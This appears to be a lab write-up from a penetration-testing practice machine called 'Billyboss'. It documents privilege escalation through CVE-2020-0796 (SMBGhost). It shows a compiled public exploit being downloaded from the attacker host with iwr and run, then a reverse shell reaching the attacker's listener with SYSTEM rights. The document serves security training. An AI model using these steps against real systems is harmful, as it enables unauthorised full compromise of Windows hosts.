CVE-2020-0796
wesng has identified that the target system is vulnerable to CVE-2020-0796
/Practice/Billyboss/5-Privilege_Escalation/attachments/{C5585EE5-B666-4055-9417-FD11E27A72FF}.png)
A vulnerability has been found in Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 and classified as very critical. Affected by this vulnerability is an unknown functionality of the component SMBv3. The manipulation as part of Server Message Block leads to input validation. This vulnerability is known as CVE-2020-0796. The attack can be launched remotely. Furthermore, there is an exploit available. A worm is spreading, which is automatically exploiting this vulnerability.
Exploit (SMBGhost)
/Practice/Billyboss/5-Privilege_Escalation/attachments/{62C86DAA-D752-4F12-B9C3-169F62558418}.png)
Exploit found online
Compilation
/Practice/Billyboss/5-Privilege_Escalation/attachments/{737822D1-62F3-4B0A-AAFD-F1F03F020A80}.png)
The default shellcode launches cmd.exe. This has to be changed
/Practice/Billyboss/5-Privilege_Escalation/attachments/{E07CD2E5-5D58-467C-AFD8-92CC2D3E57CA}.png)
shellcode array has been updated with the payload
/Practice/Billyboss/5-Privilege_Escalation/attachments/{DDBC418C-C276-4368-8D0E-A6C01538462E}.png)
Compiling complete
Exploitation
PS C:\tmp> iwr -uri http://192.168.45.245/CVE-2020-0796/x64/Release/cve-2020-0796-local.exe -Outfile C:\tmp\cve-2020-0796-local.exeDelivery complete over HTTP
PS C:\tmp> .\cve-2020-0796-local.exe
-= CVE-2020-0796 LPE =-
by @danigargu and @dialluvioso_
Successfully connected socket descriptor: 216
Sending SMB negotiation request...
Finished SMB negotiation
Found kernel token at 0xffffa683aca17060
Sending compressed buffer...
SEP_TOKEN_PRIVILEGES changed
Injecting shellcode in winlogon...
Success! ;)Executing the exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.148.61] 49713
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
billyboss
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.148.61
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.148.254System level compromise